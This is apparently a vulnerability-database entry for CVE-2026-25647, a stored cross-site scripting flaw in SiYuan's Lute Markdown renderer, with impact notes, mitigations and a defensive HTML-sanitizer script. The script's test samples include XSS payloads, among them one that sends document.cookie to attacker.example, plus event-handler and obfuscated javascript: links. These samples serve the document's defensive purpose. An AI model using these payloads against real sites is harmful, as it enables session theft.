CVE-2026-25647: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in siyuan-note siyuan
CVE-2026-25647 is a stored Cross-Site Scripting (XSS) vulnerability in the Lute Markdown rendering engine used by the SiYuan note-taking application in versions prior to 3.5.5. An attacker can inject malicious JavaScript into a Markdown note; it executes in the browser session of any other user who views the rendered content. Exploitation requires an attacker with at least limited privileges to create or modify notes, plus user interaction to trigger it. The CVSS score is 4.6 (medium severity), reflecting limited confidentiality and integrity impact and no availability impact. No exploits are currently reported in the wild. European organizations using SiYuan note versions earlier than 3.5.
AI Analysis
Technical Summary
CVE-2026-25647 identifies a stored Cross-Site Scripting (XSS) vulnerability in the Lute Markdown engine, which is integrated into the SiYuan note-taking application. Lute versions 1.7.6 and earlier, as shipped in SiYuan versions prior to 3.5.5, improperly neutralize note content during web page generation, so attacker-controlled JavaScript embedded in a Markdown note survives into the rendered HTML. When another user views that note, the script executes in their browser session, within the SiYuan origin, and can read or act on whatever that session can reach. The weakness is classified as CWE-79; in a Markdown engine this typically means raw HTML, attributes, or URL schemes reaching the output without being escaped or filtered (the record does not say which construct Lute mishandled). Exploitation requires an account able to create or edit notes and a victim who opens the affected note. The CVSS 3.1 base score of 4.6 corresponds to a network attack vector, low attack complexity, low privileges required, user interaction required, unchanged scope, and low confidentiality and integrity impact with no availability impact. No public exploit is known, but the risk is real in collaborative deployments where users who do not fully trust each other contribute content, and in single-user deployments that import or sync notes from untrusted sources. The record attaches no patch link; the affected range ends at 3.5.5, so upgrading to SiYuan 3.5.5 or later (which carries a Lute newer than 1.7.6) is the remediation. Organizations using SiYuan for note-taking and knowledge management should check their deployed version and remediate accordingly.
Potential Impact
For European organizations, successful exploitation can lead to session hijacking, theft of note contents and other data visible in the victim's session, or actions performed in the victim's name through the application's own API. The impact is most relevant where SiYuan is used as a shared knowledge base, for example in education, research, and enterprise documentation. If the victim holds a more privileged role than the attacker, the attacker effectively gains that role for the duration of the session, which is the privilege-escalation path stored XSS usually offers. Availability is not affected, but a confidentiality or integrity breach can still mean reputational damage, GDPR obligations, and operational disruption. The need for user interaction and for an account that can edit notes lowers the likelihood but does not remove it: a stored payload waits for every future reader, and in busy deployments with frequent content sharing one crafted note reaches many sessions. Remote and hybrid workforces that lean on such tools face more exposure because of their broader set of users and access patterns.
Mitigation Recommendations
1. Upgrade SiYuan to version 3.5.5 or later; this is the only fix for the rendering engine itself.
2. If you build integrations that render SiYuan or Lute output elsewhere, sanitize the rendered HTML with an allowlist (tags, attributes, and URL schemes) rather than trying to filter the Markdown source, since Markdown legitimately contains raw HTML.
3. Deploy a Content Security Policy that disallows inline script; if SiYuan is served behind a reverse proxy, the header can be added there, but test it first, as a policy the application's own front end does not expect can break the UI.
4. Educate users not to open unexpected links or shared notes from untrusted sources within SiYuan.
5. Monitor for unusual note-creation or note-modification activity, especially from low-privilege accounts, and for rendered content containing script tags, event-handler attributes, or javascript: URLs.
6. Restrict note creation and editing to trusted users where the deployment allows it, reducing the attack surface until the upgrade is complete.
7. Regularly audit third-party components such as Lute for vulnerabilities and apply updates promptly.
8. A web application firewall with XSS rules on the SiYuan endpoints is defense in depth only: stored payloads arrive through the legitimate note-editing API, so expect evasions and do not rely on it in place of the upgrade.
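The output-side sanitization step recommended above, as an added example rather than code from Lute or SiYuan: because Markdown permits raw HTML, the neutralization an engine owes CWE-79 has to be applied to the rendered HTML. The allowlist pass below drops script and style elements (including their text), comments, event-handler attributes, and href/src values whose scheme is not allowlisted, covering the entity-encoded and tab-split javascript: spellings that browsers still honour. The tag and attribute allowlists and the sample fragments are constructed for this example; the fragments stand for what an engine that passes raw HTML through unchanged could emit from a crafted note, not for the undisclosed payload behind CVE-2026-25647.

```python
"""
Added example, not code from Lute or SiYuan: an allowlist sanitizer for the
HTML a Markdown engine emits. Markdown permits raw HTML, so neutralization
has to happen on the rendered output, not on the Markdown source.
The allowlists and sample fragments below are constructed for this example.
"""
import re
from html import escape
from html.parser import HTMLParser

# Constructed allowlist: what a note body legitimately needs, nothing more.
ALLOWED_TAGS = {
    "p", "br", "hr", "a", "em", "strong", "del", "code", "pre", "blockquote",
    "ul", "ol", "li", "img", "h1", "h2", "h3", "h4", "h5", "h6", "table",
    "thead", "tbody", "tr", "th", "td",
}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}, "code": {"class"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "hr", "img"}
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")
_CONTROLS = "".join(chr(c) for c in range(0x21))  # C0 controls and space


def safe_url(value):
    """True for relative URLs and allowlisted schemes; False for javascript:, data:, vbscript:, ..."""
    if value is None:  # bare attribute such as <a href>
        return True
    # Browsers drop leading controls/space and ignore tab, LF and CR anywhere in
    # the URL, so "java\tscript:" and " javascript:" still run. Normalise the same way.
    cleaned = value.replace("\t", "").replace("\n", "").replace("\r", "").lstrip(_CONTROLS)
    m = _SCHEME.match(cleaned.lower())
    return m is None or m.group(1) in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    """Rebuilds the document from allowlisted tags/attributes only, recording what was dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # "&#106;avascript:" arrives decoded
        self.out = []
        self.dropped = []    # audit trail of (kind, detail) tuples
        self.skip_depth = 0  # >0 while inside <script>/<style>: their text is dropped too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            self.dropped.append(("tag", tag))
            return
        if self.skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(("tag", tag))  # element removed, its text is kept
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(("attr", f"{tag}@{name}"))
                continue
            if name in URL_ATTRS and not safe_url(value):
                self.dropped.append(("url", value))
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):  # conditional comments and hidden markup go too
        self.dropped.append(("comment", data))

    def handle_decl(self, decl):
        self.dropped.append(("decl", decl))

    def handle_pi(self, data):
        self.dropped.append(("pi", data))


def sanitize(rendered_html):
    """Return (clean_html, dropped). An empty `dropped` means the input was already inert."""
    s = Sanitizer()
    s.feed(rendered_html)
    s.close()
    return "".join(s.out), s.dropped


# Constructed fragments: what an engine that passes raw HTML through could emit
# from a crafted note. They are illustrations, not the CVE's disclosed payload.
SAMPLES = {
    "script_block": '<p>Meeting notes</p><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    "event_handler": '<p><img src="x" onerror="alert(document.domain)"></p>',
    "js_link": '<p><a href="javascript:alert(1)">open</a></p>',
    "encoded_js_link": '<p><a href="&#106;avascript:alert(1)">open</a></p>',
    "tab_split_js_link": '<p><a href="java\tscript:alert(1)">open</a></p>',
    "benign": '<h2>Notes</h2><p>See <a href="https://example.org/doc" title="doc">this</a> and <code class="language-go">x := 1</code></p>',
}

if __name__ == "__main__":
    for name, html in SAMPLES.items():
        clean, dropped = sanitize(html)
        print(f"{name:18} -> {clean!r}  dropped={dropped}")
```

The same function doubles as a regression check for a renderer: render a set of probe notes with the engine under test, pass each result to `sanitize`, and treat any non-empty `dropped` list as a construct the engine let through. The audit trail records the original attribute value, so the encoded and tab-split forms are reported as they appeared in the output, which is what you want when tracing a finding back to the note that produced it.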
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Denmark
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-02-04T05:15:41.792Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 69863dc0f9fa50a62f292942
Added to database: 2/6/2026, 7:15:12 PM
Last enriched: 2/6/2026, 7:31:08 PM
Last updated: 2/7/2026, 3:22:20 AM
Related Threats
- CVE-2026-2071: Buffer Overflow in UTT 进取 520W (High)
- CVE-2026-25762: CWE-400: Uncontrolled Resource Consumption in adonisjs core (High)
- CVE-2026-25754: CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in adonisjs core (High)
- CVE-2026-25644: CWE-295: Improper Certificate Validation in datahub-project datahub (High)
- CVE-2026-25804: CWE-287: Improper Authentication in antrea-io antrea (High)